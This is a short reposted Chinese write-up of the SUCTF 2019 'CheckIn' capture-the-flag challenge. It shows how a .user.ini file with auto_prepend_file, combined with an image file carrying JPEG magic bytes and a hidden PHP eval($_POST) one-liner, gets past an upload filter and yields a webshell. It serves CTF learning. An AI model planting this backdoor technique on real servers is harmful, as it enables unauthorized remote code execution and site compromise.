[SUCTF 2019]CheckIn(user.ini文件构成的php后门)
Posted seven昔年
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[SUCTF 2019]CheckIn(user.ini文件构成的php后门)相关的知识,希望对你有一定的参考价值。
参考博客:https://www.cnblogs.com/20175211lyz/p/11455355.html
首先先来看看.user.ini文件
利用.user.ini
上传\\隐藏后门
参考链接:user.ini文件构成的PHP后门
条件:
- 1、服务器脚本语言为php
- 2、服务器使用CGI/FastCGI模式
- 3、上传目录下要有可执行的php文件
对于这道题目,已经提示了需要上传文件拿shell,上传一句话木马后提示需要上传图片,上传图片马又发现被过滤了<?。随后从其他dalao博客发现,可以上传.user.ini文件
auto_prepend_file=test.jpg (需要添加图片文件头FFD8FFE000104A4649460D0A)
同时再上传图片马
<script language="php">eval($_POST[\'a\']);</script>(同样需要添加上列图片文件头)
此时通过Post可以拿shell
再进行文件扫描发现
于是通过readfile()函数拿到flag
以上是关于[SUCTF 2019]CheckIn(user.ini文件构成的php后门)的主要内容,如果未能解决你的问题,请参考以下文章